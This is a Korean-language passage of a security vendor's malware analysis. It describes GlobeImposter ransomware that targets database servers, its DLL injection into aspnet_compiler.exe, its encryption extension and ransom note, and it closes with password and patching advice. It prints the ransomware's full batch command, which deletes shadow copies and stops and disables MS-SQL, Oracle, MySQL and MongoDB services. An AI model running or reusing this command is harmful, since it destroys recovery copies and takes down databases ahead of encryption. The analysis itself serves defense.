[그림 2] 복호화된 DLL 파일
[그림 3] 복호화된 DLL 파일 호출
해당 DLL 파일은
aspnet_compiler.exe 프로세스를 생성한 다음, 인젝션하여 랜섬웨어를 실행한다. 아래와 같이 파일이 복구되는 것을 막기 위해 섀도 복사본을 삭제하고, 데이터베이스
서비스를 종료한다. 참고로 섀도 복사본은 볼륨 스냅샷 서비스(Volume
Snapshot Service)라고도 하는데, 특정 시점의 파일이나 폴더, 볼륨의 스냅샷 또는 수동 및 자동 복사본을 저장하는 기능으로 운영체제를 설치할 때 기본으로 활성화돼 있다.
C:\Windows\system32\cmd.exe /c
@echo off sc config browser sc config browser start=enabled vssadmin delete
shadows /all /quiet sc stop vss sc config vss start=disabled sc stop MongoDB sc
config MongoDB start=disabled sc stop SQLWriter sc config SQLWriter
start=disabled sc stop MSSQLServerOLAPService sc config MSSQLServerOLAPService
start=disabled sc stop MSSQLSERVER sc config MSSQLSERVER start=disabled sc stop
MSSQL$SQLEXPRESS sc config MSSQL$SQLEXPRESS start=disabled sc stop ReportServer
sc config ReportServer start=disabled sc stop OracleServiceORCL sc config
OracleServiceORCL start=disabled sc stop OracleDBConsoleorcl sc config
OracleDBConsoleorcl start=disabled sc stop OracleMTSRecoveryService sc config
OracleMTSRecoveryService start=disabled sc stop OracleVssWriterORCL sc config
OracleVssWriterORCL start=disabled sc stop MySQL sc config MySQL start=disabled
[그림 4]
RAPIT 프로세스 트리
이후 감염의 범위를 확장하기 위해 [그림 5]와 같이 드라이브를 체크하고, [표 1]의 특정 폴더와 파일명, 확장자를 제외하고 모두 감염시킨다.
[표 1] 암호화 제외 목록
[그림 5] 드라이브 체크
각 파일은 ‘[기존파일명].Globeimposter-Alpha666qqz’의 확장자로 암호화되며, 암호화
이후에는 ‘HOW TO BACK YOUR FILES.txt’라는 이름으로 랜섬 노트가 생성된다.
[그림 6] 암호화 후 생성된 랜섬 노트
MS-SQL, MySQL 등 데이터베이스 서버를 노리는 위협으로는 부적절하게 계정 정보를 관리하고 있는 시스템에 대한 무차별
대입 공격과 사전 공격, 그리고 패치되지 않은 시스템에 대한 취약점 공격이 대표적이다.
MS-SQL 서버 관리자는 이들 공격에 대비하려면 계정의 비밀번호를 추측하기 어려운 형태로 사용하고 주기적으로 변경하는 것이
좋다. 또한, 반드시 최신 버전으로 패치해야 한다.
자세한
내용은 ASEC 블로그에서 확인할 수 있다.
